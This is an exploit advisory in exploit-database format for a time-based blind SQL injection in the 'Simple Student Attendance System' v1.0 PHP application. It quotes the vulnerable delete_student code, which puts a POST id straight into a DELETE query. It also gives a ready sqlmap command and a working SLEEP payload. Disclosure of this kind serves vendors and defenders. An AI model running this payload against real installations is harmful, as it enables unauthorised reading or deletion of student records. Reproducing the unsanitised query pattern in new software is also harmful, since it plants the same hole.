# Exploit Title: Simple Student Attendance System - Time Based Blind SQL Injection
# Date: 26 December 2023
# Exploit Author: Gnanaraj Mauviel (@0xm3m)
# Vendor: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/17018/simple-student-attendance-system-using-php-and-mysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-attendance.zip
# Version: v1.0
# Tested on: Mac OSX, XAMPP, Apache, MySQL
-------------------------------------------------------------------------------------------------------------------------------------------
Source Code(/php-attendance/classes/actions.class.php):
public function delete_student(){
extract($_POST);
$delete = $this->conn->query("DELETE FROM `students_tbl` where `id` = '{$id}'");
if($delete){
$_SESSION['flashdata'] = [ 'type' => 'success', 'msg' => "Student has been deleted successfully!" ];
return [ "status" => "success" ];
}else{
$_SESSION['flashdata'] = [ 'type' => 'danger', 'msg' => "Student has failed to deleted due to unknown reason!" ];
return [ "status" => "error", "Student has failed to deleted!" ];
}
}
-> sqlmap -u "http://localhost/php-attendance/ajax-api.php?action=delete_student" --data="id=7" --technique=T --batch
---
Parameter: id (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=7' AND (SELECT 3738 FROM (SELECT(SLEEP(5)))kVAW) AND 'vAFW'='vAFW
---
